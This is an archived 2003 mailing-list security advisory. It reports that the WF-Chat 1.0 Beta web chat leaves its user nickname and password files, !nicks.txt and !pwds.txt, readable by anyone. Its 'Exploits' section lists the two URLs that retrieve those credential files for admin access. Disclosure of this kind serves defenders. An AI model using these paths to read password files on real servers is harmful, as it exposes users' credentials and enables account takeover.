WF-Chat

From: subj (r2subj3ctat_private)
Date: Tue Mar 18 2003 - 17:07:54 PST

  • Next message: mcbethhat_private: "[Full-Disclosure] Re: Some XSS vulns"

    
     ('binary' encoding is not supported, stored as-is)
    Product : WF-Chat
    Version : 1.0 Beta
    WebSite : http://jid.2yd.ru 
    Problem : Viewing users account.
    
    
    Description:
    ------------
    For own a admin accsess in this chat u'r needing view files:
    Inicks.txt
    !pwds.txt
    
    In short, all informations about registered users be at this files
    And access for reading this files have anyone
    
    Exploits:
    ---------
    
    http://[somehost]/chat/!nicks.txt
    http://[somehost]/chat/!pwds.txt
    
    
    Link:
    -----
    www.dwcgr0up.com
    
    Fixs:
    -----
    
    U can finf all our fix on our homepage [www.dwcgroup.com]
    
    Thanks:
    -------
    GipsHack : DHGroup : EXploit.ru : p0is0n : de1irium
    
    Contact:
    --------
    r2subj3ctat_private
    irc.dwcgr0up.biz @ #dwc
    



    This archive was generated by hypermail 2b30 : Wed Mar 19 2003 - 09:25:09 PST